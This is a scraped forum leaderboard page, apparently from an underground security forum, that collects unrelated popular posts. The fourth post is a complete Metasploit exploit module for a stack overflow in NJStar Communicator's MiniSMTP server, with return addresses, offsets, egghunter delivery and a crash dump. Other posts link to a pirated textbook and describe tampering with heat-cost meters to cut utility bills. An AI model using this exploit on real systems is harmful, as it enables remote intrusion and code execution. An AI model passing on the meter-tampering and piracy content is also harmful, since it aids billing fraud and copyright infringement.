
Leaderboard

Popular Content

Showing content with the highest reputation on 11/01/11 in all areas

  1. Do you remember, back when it was still Y!Messenger 8, an idle patch was released that basically replaced idle.dll from the project. That way you could have Idle as your status even while you were using the computer. Then, starting with Y!Messenger 9 if I'm not mistaken, idle.dll was removed and the function was implemented directly in the executable. Since then I have kept looking, but surprisingly I have not found any idle patch that worked (correct me if I'm wrong, I personally did not find one). With a little work in OllyDbg, I found the necessary addresses and what needs to be changed. I made a patch in C that makes all the changes by itself. You put it in the folder where YahooMessenger.exe is, run it and click Patch. That's all. To get Idle to show in your status, check that Show me as "Idle" is ticked, give it a minute, and wait until Idle appears in the status. After that it will not go away. To remove it, log out and log in. I only tested it on XP; I don't know whether it asks for administrator rights on Vista/7, you tell me. And it is tested only on version 11; I don't guarantee that it works on others. I don't mind if you spread it on other forums too.
     UPDATE: Now that 11.5 has become more popular as well, I added the patch for it too. I also added the ClearIdle option.
     Download:
     Y!M 11/11.5 IdlePatch: http://depositfiles.com/files/8sm367yy0
     Executable with the patch applied:
     Y!M 11: http://depositfiles.com/files/fb2lmhp13
     Y!M 11.5: http://depositfiles.com/files/iupwq52nn
     For those who are interested, a tutorial on how to build the hack from scratch (for 11.5 the principle is exactly the same): Y!Messenger 11 IdleHack with OllyDbg
    3 points
  2. Java concurrency
     Building and testing concurrent applications for the Java platform
     Date: 07 Oct 2011 (Published 23 Aug 2011)

     1. Learn Java concurrency basics
        Threads and processes are the basic units of execution in concurrent Java programming. Every process has at least one thread, and all of the threads in a process share its resources. Understand the benefits of threads and why it's essential to use them safely.
        READ: Introduction to Java threads

     2. Master high-level Java concurrency utilities
        Learn how to use the thread-safe, well-tested, high-performance concurrent building blocks in the java.util.concurrent package, introduced in Java SE 5. And find out how to avoid both common and lesser-known concurrency pitfalls.
        PRACTICE: Concurrency in JDK 5.0
        READ: 5 things you didn't know about ... java.util.concurrent, Part 1
        READ: 5 things you didn't know about ... java.util.concurrent, Part 2
        READ: Java concurrency bug patterns for multicore systems

     3. Test and analyze your concurrent code
        Take advantage of tools developed by IBM researchers for testing, debugging, and analyzing concurrent Java applications.
        DOWNLOAD: Java Thread Activity Analyzer (Free download)
        DOWNLOAD: IBM Lock Analyzer for Java (Free download)
        DOWNLOAD: IBM Thread and Monitor Dump Analyzer for Java (Free download)
        DOWNLOAD: Multicore Software Development Kit (Free download)
        DOWNLOAD: ConcurrentTesting - Advanced Testing for Multi-Threaded Applications (Free limited trial version)
        PRACTICE: Multithreaded unit testing with ConTest

     4. Explore alternate concurrency models
        In response to advances in multicore processor hardware, approaches to writing concurrent applications for the Java platform are diversifying. Concurrency support in two alternate languages for the JVM — Scala and Clojure — eschew the thread model. Learn about the actor and agent concurrency in those languages, and about third-party Java and Groovy libraries that implement those models. And learn more about fork-join, a multicore-friendly concurrency enhancement in Java SE 7.
        LISTEN: Alex Miller talks concurrency
        READ: Explore Scala concurrency
        READ: Clojure and concurrency
        READ: Introducing Kilim: An actor framework for Java concurrency
        READ: Resolve common concurrency problems with GPars
        READ: Java theory and practice: Stick a fork in it

     Source: www.ibm.com/developerworks/training/kp/j-kp-concurrency/index.html
    1 point
  3. HTML: Comprehensive Concepts and Techniques, 5 edition
     by Gary B. Shelly, Denise M. Woods, William J. Dorin
     2008 | ISBN: 1423927222 | 608 pages | PDF | 55 MB
     Download: http://www.filefactory.com/file/c223212/n/102711.BO.1423927222_(1).rar
     Mirror: http://www.filesonic.com/file/2854766385/102711.BO.1423927222_(1).rar
    1 point
  4. ##
     # Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
     # Date: 10/31/2011
     # Author: Dillon Beresford
     # Twitter: https://twitter.com/#!/D1N
     # Software Link: http://www.njstar.com/download/njcom.exe
     # Version: 3.00 and prior
     # Build: 11818 and prior
     # Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
     # CVE : NONE
     # Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
     # manils, d0tslash, mublix, halsten, and everyone at AHA!
     ##

     ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # Framework web site for more information on licensing and terms of use.
     # http://metasploit.com/framework/
     #
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::Tcp
       include Msf::Exploit::Egghunter

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
           'Description'    => %q{
               This module exploits a stack overflow vulnerability in NJStar Communicator
               Version 3.00 MiniSMTP server.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Dillon Beresford', # Original discovery and MSF Module.
               'Corelan Team',     # tx for mona.py, all the tuts, and for being awesome.
             ],
           'Version'        => '$Revision:$',
           'References'     =>
             [
               [ 'OSVDB', '' ],
               [ 'CVE', '' ],
               [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
               [ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'],
             ],
           'DefaultOptions' =>
             {
               'EXITFUNC' => 'thread',
             },
           'Platform'       => 'win',
           'Payload'        =>
             {
               'BadChars' => "\x00",
               'StackAdjustment' => -1500,
             },
           'Targets'        =>
             [
               [
                 'Windows XP SP3',
                 {
                   'Ret' => 0x7c874413,
                   'Offset' => 247,
                 } # jmp esp kernel32.dll
               ],
               [
                 'Windows XP SP2',
                 {
                   'Ret' => 0x77558952,
                   'Offset' => 247,
                 } # jmp esp ntdll.dll
               ],
               [
                 'Windows XP SP1',
                 {
                   'Ret' => 0x77d718fc,
                   'Offset' => 247,
                 } # jmp esp user32.dll
               ],
               [
                 'Windows Server 2003 SP0',
                 {
                   'Ret' => 0x71c033a0,
                   'Offset' => 247,
                 } # jmp esp ntdll.dll
               ],
             ],
           # Feel free to add more targets.
           'Privileged'     => false,
           'DisclosureDate' => 'OCT 31 2011',
           'DefaultTarget'  => 0))

         register_options([Opt::RPORT(25)], self.class)
       end

       def exploit
         eggoptions =
         {
           :checksum => true,
           :eggtag => "w00t"
         }

         badchars = '\x00'
         hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

         if target.name =~ /Windows XP SP3/
           buffer = rand_text(target['Offset'])
           buffer << [target.ret].pack('V')
           buffer << hunter
           buffer << make_nops(4)
         elsif target.name =~ /Windows XP SP2/
           buffer = rand_text(target['Offset'])
           buffer << [target.ret].pack('V')
           buffer << hunter
           buffer << make_nops(4)
         elsif target.name =~ /Windows XP SP1/
           buffer = rand_text(target['Offset'])
           buffer << [target.ret].pack('V')
           buffer << hunter
           buffer << make_nops(4)
         elsif target.name =~ /Windows Server 2003 SP0/
           buffer = rand_text(target['Offset'])
           buffer << [target.ret].pack('V')
           buffer << hunter
           buffer << make_nops(4)
         end

         # Just some debugging output so we can see lengths and byte size of each of our buffer.
         print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
         print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
         print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

         print_status("Trying target #{target.name}...")

         # har har har you get trick no treat...
         # we dont have very much space so we
         # send our egg in a seperate connection
         connect

         print_status("Sending the egg...")
         sock.put(egg)

         # I think you betta call, ghostbusters...
         # now we send our evil buffer along with the
         # egg hunter, we are doing multiple connections
         # to solve the issue with limited stack space.
         # thanks to bannedit for advice on threads and
         # making multiple connections to get around
         # stack space constraints.
         connect

         print_status("Sending our buffer containing the egg hunter...")
         sock.put(buffer)

         handler
         disconnect
       end
     end

     ##
     # No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
     # on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
     # is remotely exploitable and needed more verification. I sent a proof of concept exploit
     # in python with remote code execution. So, here is the proof that the bug is, in fact,
     # remotely exploitable. WIN!
     ##

     ##
     # eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
     # edi=008a3d80
     # eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
     # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
     # efl=00010206
     # 42424242 ?? ???
     # 0:003> !exchain
     # image00400000+bbc4 (0040bbc4)
     # 00ccff00: 41414141
     # Invalid exception stack at 41414141
     # 0:003> d esp
     # 00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
     # 00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
     # 00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
     # 00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
     # 00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
     # 00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
     # 00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
     # 00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........
     ##

     SOURCE
    1 point
  5. I posted a link above; study the parameters of a diode in an electrostatic/electromagnetic field and you will see. Take a diode (not an LED!) and run tests on it with a microvoltmeter, in both conditions (ES/EM) and at different voltages and amperages; you will be amazed at how induction currents block the diode.
     -------------------
     Another method, which I DO NOT RECOMMEND TO ANYONE, only for testing on separate devices, is the "lighter method" from slot machines, with the piezo from a lighter applied to the LCD, or to other parts apart from the metal plates that are "GROUND", that is, earthed through the radiator; the spark from the piezo passes through plastic too. What do you risk? ERASING THE SERIAL NUMBER OF THE HEAT ALLOCATOR, WHICH WILL BE CHANGED AND WILL NOT MATCH THE CONTRACT.
     I have had the device for sale since 2010 and I give it only to acquaintances, which is why I am leaving it to you to come up with new ideas, and I will help you build a new model designed by you; a production cost of 20 lei is not much, it cannot be more than that, compared with what you pay from November to April. The device has a few parts: a coil, a transistor... and the secondary components... and a 9V battery.
     EDITED: Heat Cannon 1400W Over Temperature Device - no change http://youtu.be/dTn6vghVutM
     Original 3gp file: http://www.megaupload.com/?d=GDXTO4XC
     Other images: http://imageshack.us/g/827/p0111110001.jpg/
    1 point
  6. Another year has passed, but to be honest a very long time has passed since many managed to get out of localhost onto the WAN. Forums hold a very large quantity of bytes because the information was written by some and rewritten by others, most systems have started to ship with a fairly advanced graphical interface, we have moved from IPv4 to IPv6, and still we find garbage on the forum.
     I sometimes wonder what some people's goals are for the future and what they expect from the underground. Every wave brings people to this forum who ask the same stupid questions in the hope of making a buck off the net, whether legally or illegally. Everyone tries to take what they can without giving anything in return; everyone destroys someone else's work without understanding it, just to gain popularity.
     I look around and see people trying to leave their mark everywhere for popularity: a deface, an XSS, an SQLi. All these things are just pieces of code copied from the internet and put in the right place at the right time to give the nickname a certain reputation and to earn respect from the others. Does this mean ELITE? Well, I would be afraid to leave my computer in these people's hands, because it might stop working and, in the worst case, I might lose all my personal data.
     And yet the information exists, it sits right under your nose, it gives you the power to control, to build and to destroy. Most people look for it but do not find it, being busy with material things. There is no currency for buying immaterial things; they are free and yet few possess them, information being one of them.
     With the necessary information you can obtain more than unauthorized access to an SSH service, you can do more than a deface, you can control more than a public web server.
     Note: Information hosted on a public web server is classified as public information, whether it is a government web server or any other.
     Knowing how things work, they can be modified.
     Information is free and yet few possess it.
    1 point
  7. Effy, I sell them by the piece... PayPal only, PM
    -1 points